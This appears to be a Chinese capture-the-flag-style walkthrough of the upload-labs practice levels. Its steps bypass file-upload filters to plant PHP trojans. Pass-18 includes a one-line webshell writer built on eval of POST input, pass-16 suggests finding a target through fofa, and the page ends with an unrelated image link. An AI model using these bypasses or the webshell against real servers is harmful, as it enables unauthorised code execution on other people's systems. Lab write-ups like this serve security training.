pass-1
提前准备好的一个PHP木马,然后将后缀名改为jpg上传

然后在上传的过程中利用抓包,将抓取到的包里面的后缀jpg改为php如图所示,然后放行

接着我们去访问上传的图片信息,如下图所示就为成功

pass-2
提前准备好的一个PHP木马,然后将后缀名改为jpg上传

然后在上传的过程中利用抓包,将抓取到的包里面的后缀jpg改为php如图所示,然后放行

接着我们去访问上传的图片信息,如下图所示就为成功

pass-3
将文件名后缀改为php5然后上传

就可以看到上传成功

pass-4
上传一个.htaccess文件

 上传一个jpg文件
 上传一个jpg文件


然后再去访问2(1).jpg

pass-5
上传一个.user.ini文件

上传一个1.jjpg文件里面是PHP文件


然后访问

pass-6
利用大小写绕过将文件后缀改为phP,然后进入页面访问,就会上传成功


pass-7
上传php文件,可以利用‘.’绕过

进入抓包在php后面加‘.’然后放行

就可以看到上传成功

pass-8
上传php文件,可以利用‘空格’绕过

进入抓包,在php后面加个空格然后放行

就可以看到上传成功

pass-9
上传一个php文件

然后进入抓包,在PHP后面加上::$DATA

然后放行就可以看到上传成功
 然后把后面的::$data去掉就可以访问的到
 然后把后面的::$data去掉就可以访问的到


pass-10
上传PHP文件

然后进入抓包

然后就上传成功

pass-11
双写后缀名绕过,将php文件改为pphphp进行上传

然后可以成功上传

pass-12
上传一个php文件

进行抓包,然后再uplaod后面加上6.php%00然后将php改为jpg
 上传成功
 上传成功
 访问不对的话将php后面的删除就可以访问到了
 访问不对的话将php后面的删除就可以访问到了


pass-13
上传一个php文件
 进入抓包再upload后面加6.php+空格然后将php改为jpg
 进入抓包再upload后面加6.php+空格然后将php改为jpg

进入hex里面将空格16进制改为00
 上传成功
 上传成功
 将6.php后面的删除就可以访问到了
 将6.php后面的删除就可以访问到了

 
 
 pass-14
 
将一张图片和一个php文件放在cmd根目录,运行copy a.jpg/b+1.php/a shell.jpg

上传shell.jpg,打开之后发现上传成功
 
 
pass-15
同14关一样上传shell.jpg然后打开查询

pass-16
我的环境不支持,大家可以去fofa上找一个
pass-17
图片需要二次渲染,上传图片

pass-18
在php文件中写入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

然后上传文件时进行抓包进行无限制发送攻击


攻击到当文件中出来webshell.php就说明上传成功

pass-19
自己研究一下吧
pass-20
编辑一个php文件然后上传

上传成功

然后进行访问


![[米联客-XILINX-H3_CZ08_7100] FPGA程序设计基础实验连载-23 VTC视频时序控制器设计](https://i-blog.csdnimg.cn/direct/804497a32b41462f82ea82c7cbddade5.png)

















